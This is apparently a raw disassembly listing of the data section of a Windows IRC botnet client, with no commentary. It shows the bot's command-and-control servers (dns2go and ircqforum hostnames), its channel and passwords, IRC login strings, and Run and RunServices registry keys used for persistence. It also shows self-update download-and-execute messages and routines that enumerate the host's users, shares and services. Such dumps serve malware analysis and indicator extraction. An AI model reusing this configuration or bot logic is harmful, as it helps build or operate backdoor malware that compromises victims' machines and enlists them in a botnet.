db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUpdateFailedEr db ' Update failed: Error executing file: %s.',0
unk_429B2C db 2 ; DATA XREF: sub_40B105+3C9�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDownloaded_1fk db ' Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.',0
align 4
dword_429B7C dd 7A026E02h, 201F6D1Fh, 776F6428h, 616F6C6Eh, 1F702E64h
; DATA XREF: sub_40B105+358�o
dd 29671F6Ch, 0BBBB0220h, 4F202002h, 656E6570h, 25203A64h
dd 2E73h
aOpen db 'open',0 ; DATA XREF: sub_40B105+336�o
; sub_40D2E0+2B48�o ...
align 10h
unk_429BB0 db 2 ; DATA XREF: sub_40B105+2E1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDownloaded_1fK db ' Downloaded %.1f KB to %s @ %.1f KB/sec.',0
align 4
unk_429BF8 db 2 ; DATA XREF: sub_40B105+262�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCrcFailedDD_ db ' CRC Failed (%d != %d).',0
align 10h
unk_429C30 db 2 ; DATA XREF: sub_40B105+1D8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFilesizeIsInco db ' Filesize is incorrect: (%d != %d).',0
align 4
unk_429C74 db 2 ; DATA XREF: sub_40B105+195�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUpdateSDkbTran db ' Update: %s (%dKB transferred).',0
align 4
unk_429CB4 db 2 ; DATA XREF: sub_40B105+183�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFileDownloadSD db ' File download: %s (%dKB transferred).',0
align 4
unk_429CFC db 2 ; DATA XREF: sub_40B105+77�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCouldnTOpenFil db ' Couldn',27h,'t open file: %s.',0
align 4
aUnknown_0 db 'Unknown',0 ; DATA XREF: sub_40B6AD:loc_40B6F0�o
; sub_40C3BC+10A�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_40B6AD:loc_40B6EA�o
aDisk db 'Disk',0 ; DATA XREF: sub_40B6AD:loc_40B6E4�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_40B6AD:loc_40B6DE�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_40B6AD:loc_40B6D8�o
align 4
off_429D5C dd offset word_4D4152 ; DATA XREF: sub_40B6AD:loc_40B6D2�o
aFailed db 'failed',0 ; DATA XREF: sub_40B73E:loc_40B81C�o
; sub_40B862+3B�o
align 4
aSkb db '%sKB',0 ; DATA XREF: sub_40B73E+6C�o
align 10h
unk_429D70 db 2 ; DATA XREF: sub_40B862+8E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Fh, 72h
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSDriveSSTotalS db ' %s Drive (%s): %s total, %s free, %s available.',0
align 4
unk_429DBC db 2 ; DATA XREF: sub_40B862+58�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Fh, 72h
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSDriveSFailedT db ' %s Drive (%s): Failed to stat, device not ready.',0
aA_0 db 'A:\',0 ; DATA XREF: sub_40B934:loc_40B979�o
dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 3000005h, 10h, 18h, 1, 3 dup(0)
; ---------------------------------------------------------------------------
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
dword_429E9C dd 25207325h, 253A2073h, 0A0D73h ; DATA XREF: sub_40BAE7+5D�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_40BAE7+16�o
; sub_40D2E0+623�o
aNotice db 'NOTICE',0 ; DATA XREF: sub_40BAE7+F�o
; sub_40D2E0+62F�o
align 4
off_429EB8 dd offset aAdd ; DATA XREF: sub_40BB87+60�r
; sub_40BF5E+51�r ...
; "Add"
off_429EBC dd offset aAdded ; DATA XREF: sub_40BB87+2D�r
; sub_40BF5E+83�r ...
; "Added"
dword_429EC0 dd 0 ; DATA XREF: sub_40BB87+18�r
dd offset aDelete_0 ; "Delete"
dd offset aDeleted ; "Deleted"
align 10h
dd offset aList_0 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 8
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 429F2Ch, 429F24h, 2, 429F18h, 429F0Ch, 3, 746E6F43h
dd 65756E69h, 64h, 746E6F43h, 65756E69h, 0
aPaused db 'Paused',0
align 4
aPause_0 db 'Pause',0
align 4
aStopped_0 db 'Stopped',0 ; DATA XREF: _2:00429EEC�o
aStop_0 db 'Stop',0 ; DATA XREF: _2:00429EE8�o
align 4
aStarted db 'Started',0 ; DATA XREF: _2:00429EE0�o
aStart_0 db 'Start',0 ; DATA XREF: _2:00429EDC�o
align 4
aListed db 'Listed',0 ; DATA XREF: _2:00429ED4�o
align 4
aList_0 db 'List',0 ; DATA XREF: _2:00429ED0�o
align 4
aDeleted db 'Deleted',0 ; DATA XREF: _2:00429EC8�o
aDelete_0 db 'Delete',0 ; DATA XREF: _2:00429EC4�o
align 4
aAdded db 'Added',0 ; DATA XREF: _2:off_429EBC�o
align 4
aAdd db 'Add',0 ; DATA XREF: _2:off_429EB8�o
dword_429F80 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40BB87+67�o
dd 2BBBB02h
aSNoServiceSpec db ' %s: No service specified.',0
dword_429FB4 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40BB87+51�o
dd 2BBBB02h
aErrorWithServi db ' Error with service: ',27h,'%s',27h,'. %s',0
align 4
dword_429FEC dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40BB87+33�o
dd 2BBBB02h
aSServiceS_ db ' %s service: ',27h,'%s',27h,'.',0
aAnUnknownErr_0 db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_40BCA3+12C�o
align 4
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_40BCA3:loc_40BDBB�o
align 4
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_40BCA3:loc_40BDB4�o
align 10h
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_40BCA3:loc_40BDAD�o
db 'the state of the service.',0
align 4
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_40BCA3:loc_40BDA6�o
align 4
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_40BCA3:loc_40BD9F�o
db ' correct access rights.',0
align 4
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_40BCA3:loc_40BD98�o
align 4
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_40BCA3:loc_40BD91�o
align 4
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_40BCA3:loc_40BD8A�o
align 10h
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_40BCA3:loc_40BD83�o
db 'marked for deletion.',0
align 4
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_40BCA3:loc_40BD7C�o
align 10h
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_40BCA3:loc_40BD51�o
align 10h
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_40BCA3:loc_40BD4A�o
db ' the service.',0
align 10h
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_40BCA3:loc_40BD43�o
db 'tServiceCtrlDispatcher.',0
align 4
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_40BCA3:loc_40BD3C�o
align 4
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_40BCA3+8F�o
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_40BCA3:loc_40BD11�o
db 'dependent on it.',0
align 4
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_40BCA3:loc_40BD07�o
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_40BCA3:loc_40BCFD�o
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_40BCA3:loc_40BCF3�o
align 10h
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_40BCA3:loc_40BCE9�o
align 4
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_40BCA3+3C�o
align 4
aSSS db '%s: %s (%s)',0 ; DATA XREF: sub_40BE21+EB�o
aStopped db ' Stopped',0 ; DATA XREF: sub_40BE21:loc_40BEED�o
aStarting db ' Starting',0 ; DATA XREF: sub_40BE21:loc_40BEE6�o
aStoping db ' Stoping',0 ; DATA XREF: sub_40BE21:loc_40BEDF�o
aRunning db ' Running',0 ; DATA XREF: sub_40BE21:loc_40BED8�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_40BE21:loc_40BED1�o
aPausing db ' Pausing',0 ; DATA XREF: sub_40BE21:loc_40BECA�o
aPaused_0 db ' Paused',0 ; DATA XREF: sub_40BE21:loc_40BEC3�o
aUnknown_1 db ' Unknown',0 ; DATA XREF: sub_40BE21+9B�o
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_40BE21+25�o
align 10h
dword_42A550 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40BF5E+AC�o
dd 2BBBB02h
aSNoShareSpecif db ' %s: No share specified.',0
align 4
dword_42A584 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40BF5E+8A�o
dd 2BBBB02h
aSShareS_ db ' %s share: ',27h,'%s',27h,'.',0
align 10h
dword_42A5B0 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40BF5E+58�o
dd 2BBBB02h
aSErrorWithShar db ' %s: Error with share: ',27h,'%s',27h,'. %s',0
align 4
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_40C154+D0�o
align 4
aNo db 'No',0 ; DATA XREF: sub_40C154+BC�o
align 4
aYes db 'Yes',0 ; DATA XREF: sub_40C154+B5�o
dword_42A60C dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C154+76�o
dd 2BBBB02h
aShareListError db ' Share list error: %s <%ld>',0
align 4
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_40C154+26�o
align 4
dword_42A67C dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C275+B7�o
dd 2BBBB02h
aSNoUsernameSpe db ' %s: No username specified.',0
align 4
dword_42A6B4 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C275+95�o
dd 2BBBB02h
aSErrorWithUser db ' %s: Error with username: ',27h,'%s',27h,'. %s',0
dword_42A6F0 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C275+6D�o
dd 2BBBB02h
aSUsernameS_ db ' %s username: ',27h,'%s',27h,'.',0
align 10h
dword_42A720 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C3BC+3AF�o
dd 2BBBB02h
aUserInfoErrorL db ' User info error: <%ld>',0
align 4
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_40C3BC+385�o
align 4
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_40C3BC+35A�o
align 4
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_40C3BC+32F�o
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_40C3BC+304�o
align 4
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_40C3BC+2D9�o
align 4
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_40C3BC+2AE�o
align 4
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_40C3BC+283�o
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_40C3BC+258�o
align 4
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_40C3BC+22D�o
align 4
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_40C3BC+202�o
align 4
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_40C3BC+1D7�o
align 10h
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_40C3BC+1AC�o
align 10h
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_40C3BC+181�o
align 4
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_40C3BC+156�o
align 4
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_40C3BC+12B�o
aGuest db 'Guest',0 ; DATA XREF: sub_40C3BC:loc_40C4DB�o
align 10h
aUser_1 db 'User',0 ; DATA XREF: sub_40C3BC:loc_40C4D4�o
align 4
aAdministrator db 'Administrator',0 ; DATA XREF: sub_40C3BC:loc_40C4CD�o
align 4
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_40C3BC+DA�o
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_40C3BC+AF�o
align 4
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_40C3BC+84�o
align 4
aAccountS db 'Account: %S',0 ; DATA XREF: sub_40C3BC+50�o
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_40C7A5+14F�o
align 4
dword_42A8EC dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C7A5+F7�o
dd 2BBBB02h
aAnAccessViolat db ' An access violation has occured.',0
align 4
aS_5 db ' %S',0 ; DATA XREF: sub_40C7A5+BE�o
align 10h
dword_42A930 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C7A5+7A�o
dd 2BBBB02h
aUserListErrorS db ' User list error: %s <%ld>',0
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_40C7A5+29�o
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_40C925:loc_40CA42�o
align 4
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_40C925:loc_40CA3B�o
align 4
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_40C925:loc_40CA34�o
align 10h
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_40C925:loc_40CA2D�o
align 10h
aAnUnknownError db 'An unknown error occurred.',0 ; DATA XREF: sub_40C925:loc_40CA26�o
align 4
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_40C925:loc_40CA09�o
db 'ord policy requirement.)',0
align 4
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_40C925:loc_40CA02�o
align 4
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_40C925:loc_40C9FB�o
align 4
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_40C925+CF�o
db ' the domain.',0
align 4
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_40C925:loc_40C9D0�o
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_40C925:loc_40C9C9�o
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_40C925:loc_40C9C2�o
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_40C925:loc_40C9B8�o
align 10h
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_40C925+89�o
align 4
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_40C925:loc_40C992�o
align 10h
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_40C925:loc_40C988�o
align 10h
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_40C925:loc_40C97E�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_40C925:loc_40C974�o
align 4
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_40C925:loc_40C96A�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_40C925+3B�o
align 4
dword_42AC48 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40CA59+AB�o
dd 2BBBB02h
aSServerSMessag db ' %s <Server: %S> <Message: %S>',0
dword_42AC80 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40CA59+81�o
dd 2BBBB02h
aMessageSentSuc db ' Message sent successfully.',0
align 4
dword_42ACB8 dd 1B58h ; DATA XREF: sub_40CB17+3A3�r
; sub_40CB17+456�r
dword_42ACBC dd 0C8Bh ; DATA XREF: sub_40CB17+4A2�r
dword_42ACC0 dd 30EAh ; DATA XREF: sub_40D2E0:loc_413078�r
dword_42ACC4 dd 18F4h ; DATA XREF: sub_405898+3B�r
; sub_40D2E0+52E6�r
dword_42ACC8 dd 1BB0h ; DATA XREF: sub_405898:loc_405B47�r
; sub_40D2E0:loc_4126BB�r
dword_42ACCC dd 0A84h ; DATA XREF: sub_40D2E0:loc_412831�r
dword_42ACD0 dd 1 ; DATA XREF: sub_40D2E0+665�r
dword_42ACD4 dd 1 ; DATA XREF: sub_40CB17+13D�r
dword_42ACD8 dd 1 ; DATA XREF: sub_409288+C�r
; sub_40CB17:loc_40CE46�r
byte_42ACDC db 2Eh ; DATA XREF: sub_40B5F7:loc_40B603�r
; sub_40D2E0+B05�r ...
align 10h
dword_42ACE0 dd 6 ; DATA XREF: sub_413E04+2B�r
; sub_413E04+51�r ...
dword_42ACE4 dd 4 ; DATA XREF: sub_40D000+78�r
; sub_40D2E0+279�r ...
a8652 db '8652',0
align 10h
aCool_0 db 'cool',0
align 4
aMan db 'man',0
align 10h
aAsn139_0 db 'asn139',0
align 4
db 2 dup(0)
byte_42AD0A db 1 ; DATA XREF: sub_40D2E0:loc_4121B2�r
; sub_40D2E0+4EDC�o
aAsn445_0 db 'asn445',0
align 4
dd 100h, 3 dup(0)
aBotid db 'botid',0 ; DATA XREF: sub_40CB17+5A�o
; sub_40D2E0+3E40�o ...
align 4
aAbosal7Tool db 'ABOSAL7 tool',0 ; DATA XREF: sub_40D2E0:loc_413290�o
align 4
aCool db 'cool',0 ; DATA XREF: sub_40D2E0+6129�o
; sub_40D2E0+61F8�o
align 4
aScorti1_dns2go db 'scorti1.dns2go.com',0 ; DATA XREF: sub_40CB17+38E�o
; sub_40CB17+447�o
align 4
aFaak db '#faak#',0 ; DATA XREF: sub_40CB17+3AF�o
; sub_40CB17+45D�o
align 10h
aSaad_ db 'saad.',0 ; DATA XREF: sub_40CB17+3C6�o
; sub_40CB17+46F�o
align 4
byte_42AD68 db 73h ; DATA XREF: sub_40CB17:loc_40CF9C�r
; sub_40CB17+493�o
aAber_ircqforum db 'aber.ircqforum.com',0
aFaak_0 db '#faak#',0 ; DATA XREF: sub_40CB17+4A9�o
align 4
aSaad__0 db 'saad.',0 ; DATA XREF: sub_40CB17+4BB�o
align 4
byte_42AD8C db 67h ; DATA XREF: sub_40345C+3E�o
; sub_405898+68�o ...
db 63h, 6Ah, 66h
dd 6F726A62h, 78652E61h, 65h
dword_42AD9C dd 65627663h, 6C642E69h, 6Ch ; DATA XREF: sub_4022C6+3D�o
aSystam13 db 'Systam13',0 ; DATA XREF: sub_40A7C2+E�o
align 4
aBot db '[bot]-',0 ; DATA XREF: sub_413E04+12�o
align 4
aFirstswin_exe db 'firstswin.exe',0
align 4
aXi db '+xi',0 ; DATA XREF: sub_40D2E0+6274�o
aF_0 db '#f',0 ; DATA XREF: sub_40D2E0:loc_41055D�o
; sub_40D2E0+509C�o
align 4
aF_1 db '#f',0 ; DATA XREF: sub_40D2E0+1F2F�o
align 4
aF_2 db '#f',0 ; DATA XREF: sub_40D2E0+1D75�o
align 4
off_42ADDC dd offset dword_42AE9C ; DATA XREF: sub_40D2E0:loc_41345C�o
off_42ADE0 dd offset dword_42AE90 ; DATA XREF: sub_40D2E0+8CF�r
; sub_40D2E0+6198�o
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
align 4
db 53h
aOftwareMicro_0 db 'oftware\Microsoft\Windows\CurrentVersion\RunServices',0
align 4
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_4143F6+28�o
; sub_41471A+28�o
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_4143F6+D4�o
; sub_41471A+D4�o
align 4
dword_42AE8C dd 10h ; DATA XREF: sub_40A4BB+72�w
; sub_40D2E0+B6E�r ...
dword_42AE90 dd 6B633468h, 74207265h, 6C6F6Fh ; DATA XREF: _2:off_42ADE0�o
dword_42AE9C dd 6461402Ah, 2E6E696Dh, 6D6F63h ; DATA XREF: _2:off_42ADDC�o
dword_42AEA8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40CB17+352�o
dd 2BBBB02h, 6F422020h, 74732074h, 65747261h, 2E64h
dword_42AED0 dd 25207325h, 25222064h, 2273h ; DATA XREF: sub_40CB17+280�o
dword_42AEDC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D000+F2�o
dd 2BBBB02h
aConnectedToS_ db ' Connected to %s.',0
align 4
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_40D168+62�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_40D168+35�o
align 10h
aModeSS db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40D2E0+627C�o
align 10h
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_40D2E0+6264�o
align 10h
dword_42AF50 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+6257�o
dd 2BBBB02h
aUserSLoggedIn_ db ' User: %s logged in.',0
align 10h
dword_42AF80 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+623A�o
dd 2BBBB02h
aAbosal7Accepte db ' ABOSAL7 accepted.',0
dword_42AFAC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+61D9�o
dd 2BBBB02h
aFailedHostAuth db ' *Failed host auth by: (%s!%s).',0
align 4
dword_42AFE8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+6172�o
dd 2BBBB02h
aFailedPassAuth db ' *Failed pass auth by: (%s!%s).',0
align 4
aNoticeSYouVeBe db 'NOTICE %s :You',27h,'ve been logged.',0Dh,0Ah,0
; DATA XREF: sub_40D2E0+6160�o
; sub_40D2E0+61C7�o
align 4
aNoticeSNiceTry db 'NOTICE %s :Nice try, idiot. (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_40D2E0+6149�o
; sub_40D2E0+61B0�o
align 10h
asc_42B070: ; DATA XREF: sub_40D2E0+6119�o
unicode 0, <~>,0
dword_42B074 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+60C9�o
dd 2BBBB02h
aRandomNickChan db ' Random nick change: %s',0
align 4
dword_42B0A8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+6015�o
dd 2BBBB02h
aInvalidLoginSl db ' Invalid login slot number: %d.',0
align 4
dword_42B0E4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+600A�o
dd 2BBBB02h
aNoUserLoggedIn db ' No user logged in at slot: %d.',0
align 10h
dword_42B120 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+5FB5�o
dd 2BBBB02h, 73252020h, 0
unk_42B140 db 2 ; DATA XREF: sub_40D2E0+5F8B�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToStar_6 db ' Failed to start secure thread, error: <%d>.',0
align 4
dword_42B18C dd 7A026E02h, 201F6D1Fh, 63657328h, 2E657275h, 1F6C1F70h
; DATA XREF: sub_40D2E0+5F15�o
dd 2202967h, 2002BBBBh, 20732520h, 74737973h, 2E6D65h
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_40D2E0+5F0F�o
align 10h
aSecuring db 'Securing',0 ; DATA XREF: sub_40D2E0+5F08�o
align 4
aSec db 'sec',0 ; DATA XREF: sub_40D2E0+5EAD�o
aSecure db 'secure',0 ; DATA XREF: sub_40D2E0+5E9C�o
align 4
unk_42B1D8 db 2 ; DATA XREF: sub_40D2E0+5E91�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToStar_7 db 'Failed to start server thread, error: <%d>.',0
dword_42B220 dd 69026602h, 6966646Eh, 1F651F6Ch, 2E2Eh ; DATA XREF: sub_40D2E0+5D6F�o
dword_42B230 dd 646E6946h, 6C696620h, 65h ; DATA XREF: sub_40D2E0+5D6A�o
dword_42B23C dd 72027002h, 1F631F6Fh, 2E2Eh ; DATA XREF: sub_40D2E0+5D57�o
dword_42B248 dd 636F7250h, 20737365h, 7473696Ch, 0 ; DATA XREF: sub_40D2E0+5D52�o
dword_42B258 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+5D1F�o
dd 2BBBB02h, 65522020h, 6E6E6F63h, 69746365h, 2E676Eh
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_40D2E0:loc_412FF2�o
align 4
dword_42B298 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+5CFD�o
dd 2BBBB02h, 69442020h, 6E6F6373h, 7463656Eh, 2E676E69h
dd 0
